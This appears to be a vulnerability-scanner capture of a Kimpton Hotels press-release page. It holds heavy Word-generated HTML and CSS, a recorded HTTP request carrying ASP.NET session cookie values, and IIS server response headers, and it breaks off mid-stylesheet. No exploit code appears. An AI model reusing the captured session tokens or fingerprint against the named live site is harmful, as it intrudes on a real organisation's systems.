<w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:28848037; mso-list-type:hybrid; mso-list-template-ids:182875624 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l1:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2 {mso-list-id:854463416; mso-list-type:hybrid; mso-list-template-ids:-2144938804 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l3 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l3:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l5 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l6 {mso-list-id:1707218260; mso-list-type:hybrid; mso-list-template-ids:1001260830 1676557052 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-start-at:0; mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l6:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l7 {mso-list-id:1929657465; mso-list-type:hybrid; mso-list-template-ids:1347988556 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-hansi-font-family:Calibri;}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]></span></p><p class=MsoNormal><span style='font-size:8.0pt'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><b><span style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FOR IMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><b><span style='font-size:8.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz&amp; Company for Kimpton<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>ChloeMata Crane / 212-982-8300 x104 / <a href="mailto:cmcrane@baltzco.com">cmcrane@baltzco.com</a>&nbsp;&nbsp;&nbsp;&..
- /pdfs/press/html/Cocktails-Cure-1109/

/pdfs/press/html/Cocktails-Cure-1109/

http://www.kimptonhotels.com/pdfs/press/html/Cocktails-Cure-1109/

Request

GET /pdfs/press/html/Cocktails-Cure-1109/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Cocktails-Cure-1109/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 33247
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images//filelist.xml"><link rel=Edit-Time-Data href="images//editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>10</o:TotalTime> <o:LastPrinted>2009-11-18T18:19:00Z</o:LastPrinted> <o:Created>2009-11-18T18:21:00Z</o:Created> <o:LastSaved>2009-11-18T18:21:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>849</o:Words> <o:Characters>4842</o:Characters> <o:Lines>40</o:Lines> <o:Paragraphs>9</o:Paragraphs> <o:CharactersWithSpaces>5946</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;} /* Page Definitions */@page {mso-footnote-separator:url(":images/:header.htm") fs; mso-footnote-continuation-separator:url(":images/:header.htm") fcs; mso-endnote-separator:url(":images/:header.htm") es; mso-endnote-continuation-separator:url(":images/:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:854463416; mso-list-type:hybrid; mso-list-template-ids:-2144938804 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l2 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l2:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l4 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 